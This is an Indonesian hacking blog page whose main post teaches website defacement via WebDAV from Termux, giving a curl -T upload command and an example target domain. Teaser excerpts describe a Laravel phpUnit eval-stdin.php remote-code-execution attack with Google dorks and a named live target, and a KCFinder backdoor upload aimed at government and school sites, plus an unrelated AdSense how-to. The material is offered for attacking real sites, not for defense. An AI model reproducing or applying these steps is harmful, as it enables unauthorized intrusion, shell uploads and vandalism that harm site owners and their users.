Cara deface poc webdav di termux

HELLO ALL ^_^
KAMI AKAN MENSHARE CARA DEFACE DENGAN TERMUX

Bahan bahan
-dork vuln
-termux (ada di playstore)

Cara untuk pasang curl

-apt upgrade
-apt update
-pkg install curl

Pindahkan script kalian di penyimpanan internal dan
jangan di folder letak kan di luar
Sesudah itu lalu ketikan
Liat target nya home nya di index.html atau di index.htm
Cara nya tinggal nambah di belakang url www.target.co.za
menjadi www.target.co.za/index.html atau /index.htm
Lalu ketikan

curl -T /storage/emulated/0/index.html TARGET

Contoh:curl -T /storage/emulated/0/index.html www.nicestuff.co.za

Comments

Tutorial deface POC Laravel phpUnit UPLOAD SHELL

Tutorial deface POC Laravel phpUnit UPLOAD SHELV Setelah sekian lama kami tidak update seputar deface kali ini kami akan berbagi tutorial tentang Laravel phpUnit UPLOAD SHELL. Teknik yang satu ini memanfaatkan sebuah bug dari Fitur yang di sediakan oleh pengguna laravel yaitu php unit dengan cara menggunakan remote code execution (RCE) Tutorial / Cara Upload Shell Metode Laravel phpUnit to RCE( Remote Code Execution ) dengan BurpSuite Pertama siapkan : - BurpSuite ( download di google banyak ) - Browser Dorking di google : - inurl:vendor/phpunit/phpunit/src/ - inurl:/src/Util/PHP/ intitle:index of - inurl:/Util/PHP/ "eval-stdin.php" * kembangin lagi biar dapet target lebih fresh Exploit : /eval-stdin.php site.co.li/vendor/phpunit/phpunit/src/Util/PHP/eval.stdin.php * kalau blank putih berarti vuln Oke langsung aja, disini gua udh dapet targetnya : http://www.olapcemetery.com//vendor/phpunit/phpunit/src/Util/PHP/eval-stdin...

Celah KCFinder

KCFinder adalah salah satu plugin populer untuk web file management yang biasa diintegrasikan dengan editor tinymce, ckeditor dan masih banyak lagi yang biasa digunakan oleh para web master. Celah keamanan ini bahkan sampai di versi yang paling baru. Cek di http://kcfinder.sunhater.com untuk lihat. Sebenarnya ini bukanlah hal yang baru, tapi sebagian admin yang jarang update info banyak juga yang kena batunya. Saya sendiri masih mendapati beberapa instansi pemerintah, lembaga pendidikan, perusahaan dalam negeri yang berpotensi diserang dengan bug ini. Bagaimana cara dapatnya? Simpel saja, saya gunakan mata omm google yang tembus pandang untuk melihat target. Google dorknya inurl: index of/kcfinder/browse.php site:.co.id Di atas hanya contoh ya… setelah itu, kita tinggal upload file backdoornya. Sebagian server memproteksi dengan mereject file PHP. Jadi kita main kucing-kucingan saja. Itu file backdoor kita ganti ekstensinya dari .php ke .jpg atau .php3. Tapi yang ...

Cara Melihat Penghasilan Adsense Di Blogger

Hai sobat Di artikel kali ini saya akan membagikan trik untuk melihat penghasilan Adsense kamu Di Blogger.Artikel ini sebetulnya untuk pemilik blog atau website yang sudah diterima dan mempunyai penghasilan dari Adsense. epjmku Jadi bagi kalian yang belum terdaftar di Adsense juga tidak apa-apa membaca artikel karena untuk menambah pengetahuan kalian untuk melihat penghasilan Adsense kalian kedepannya.Dan langsung aja ini dia caranya : Cara Melihat Penghasilan Adsense Di Blogger 1.Login blog kamu di www.blogger.com atau juga bisa menggunakan aplikasi Blogger 2.Klik setelan epjmku 3.Setelah itu pilih menu Bahasa dan pemformatan epjmku 4.Setelah itu ganti Bahasa Indonesia menjadi Bahasa Inggris epjmku Catatan : ...

Mr.TUKEN

Search This Blog